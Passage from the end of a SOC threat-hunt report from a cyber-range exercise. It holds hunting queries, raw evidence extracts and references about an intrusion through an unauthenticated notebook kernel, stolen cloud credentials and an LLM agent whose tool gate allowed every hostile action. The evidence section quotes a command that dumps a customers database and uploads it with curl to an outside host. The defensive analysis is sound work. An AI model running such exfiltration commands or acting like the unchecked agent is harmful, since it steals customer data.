11:36))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"gf-tg-nb01"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ShellUser,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LinuxAuth_CL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11:31)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DvcHostname == "gf-tg-bastion01" and TargetUsername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TargetUsername, EventResult, EventOriginalMessage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F6 login discriminator vs ~318 baseline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LinuxAuth_CL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DvcHostname == "gf-tg-bastion01" and EventResult == "Success"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logins=count() by TargetUsername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logins desc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F7 dump proved from the database, and the exfil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Computer == "gf-tg-pg01"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SyslogMessage has "connection authorized" and SyslogMessage has "database=customers"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SyslogMessage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ShellUser == "deploy" and Command has "pg_dump"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Computer, ShellUser,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F8 session baseline and gate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records=count(), start_time=min(TimeGenerated), end_time=max(TimeGenerated) by session_id, actor, RunId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start_time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LLMAgentLogs_CL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session_id == "tg-4b81e0d7"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tool_name, gate_decision, gate_reason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F9 discrimination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LinuxProcess_CL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Dvc == "gf-tg-nb01" and TargetProcessName == "python3.12"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count() by ActingProcessCommandLine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EventName == "GetSecretValue"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UserIdentityArn, UserIdentityAccessKeyId, SourceIpAddress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F10 attacker user-agent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AWSCloudTrail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11:05)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UserIdentityAccessKeyId == "AKIA4TIDEGLASS0EXAMPLE"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by UserAgent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F7 nightly-backup separation (day-scoped)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00:00) .. datetime(2026-09-04 23:59))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Command has "pg_dump"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Computer, ShellUser, Command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sort by TimeGenerated asc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F7 exfil connection (second source for the upload)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LinuxNetwork_CL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EventStartTime between (datetime(2026-09-04 11:40) .. datetime(2026-09-04 11:57))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DstIpAddr == "203.0.113.41"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EventStartTime, SrcIpAddr, SrcPortNumber, DstIpAddr, DstPortNumber, ActorUsername, ActingProcessName, ActingProcessId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Credential-path negative finding (deploy reading a DB credential)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LinuxShellHistory_CL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TimeGenerated between (datetime(2026-09-04 11:34) .. datetime(2026-09-04 11:41))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ShellUser == "deploy"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where Command has_any (".pgpass", "PGPASSWORD", "cat", "env")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 TimeGenerated, Command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="vhgvjjv589jb" w:id="39"/>
    <w:bookmarkEnd w:id="39"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">B. Raw evidence extracts</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ApacheAccess_CL 11:05:00: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GET /ws/kernel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101 from 198.51.100.23</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LinuxProcess_CL 11:05:06: python3.12 PID 5211, parent PID 3310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/opt/venv/bin/marimo edit --host 0.0.0.0 --port 2718 --no-token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 11:05:02: "...kernel WebSocket accepts code without authentication (CVE-2026-39987)..."</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 11:08:19: "Role credentials retrieved for arn:aws:iam::402913776148:user/svc-notebook."</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AKIA4TIDEGLASS0EXAMPLE across 203.0.113.71/.94/.118/.142/.167/.203</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LinuxAuth_CL 11:34:27: "Accepted publickey for deploy from 10.6.0.10 ... ED25519 SHA256:mNq7xR2vTbY8kLpJ4wZaHc1oUeVgX5tDsQiFj0rWnAE"</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 11:37:42: "customers ... largest object ... 2841902 rows"</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Syslog 11:40:44: "connection authorized: user=app database=customers host=10.6.0.20"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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 11:40:49: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 -h 10.6.0.30 -U app -Fc customers | gzip | curl -s -T - https://203.0.113.41:8443/u</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LLMAgentLogs_CL, hostile session: gate_decision=allow, gate_reason="no policy matched" on all nine actions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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AWSCloudTrail, attacker key: UserAgent = python-httpx/0.27.0 (single value across all calls)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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 nightly backup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 -h localhost -U backup -Fc greenfield_platform | gzip &gt; /backup/nightly/greenfield_platform.dump.gz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(backup@gf-tg-pg01), vs theft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pg_dump -h 10.6.0.30 -U app -Fc customers | gzip | curl -s -T - https://203.0.113.41:8443/u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(deploy@gf-tg-bastion01, 11:40:49)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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LinuxNetwork_CL 11:40:49.336: outbound TCP 10.6.0.20:51402 (bastion, deploy) to 203.0.113.41:8443, ActingProcessName bash PID 6310 (second source for the upload; no bytes/duration field)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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LinuxShellHistory_CL: search for deploy-account DB-credential access (.pgpass/PGPASSWORD/cat/env), 11:34 to 11:41 = no rows (credential-path gap)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="1uu8nlp18b8v" w:id="40"/>
    <w:bookmarkEnd w:id="40"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C. Reference list</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MITRE ATT&amp;CK, attack.mitre.org (T1190, T1059.006, T1552.004, T1552.005, T1555.006, T1078.004, T1090, T1021.004, T1213.006, T1567.002)</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MITRE ATLAS, atlas.mitre.org, v2026.09 (AML.T0098, AI Agent Tool Credential Harvesting, Realized)</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Sysdig Threat Research / The Hacker News: LLM Agent Post-Exploitation after Marimo CVE-2026-39987, https://thehackernews.com/2026/05/attackers-use-llm-agent-for-post.html</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PEAK Threat Hunting Framework (Splunk SURGe); TaHiTI methodology</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CVE-2026-39987 (marimo unauthenticated kernel RCE)</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MITRE ATLAS mitigation AML.M0032, Segmentation of AI Agent Components</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LOG(N) Pacific Cyber Range. Hunt report shaped to PEAK (Splunk SURGe) and TaHiTI. PacificWatch SOC // Hunt 24 TideGlass // Analyst: Jenna Frank // 2026-09-21.</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28.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png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.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9.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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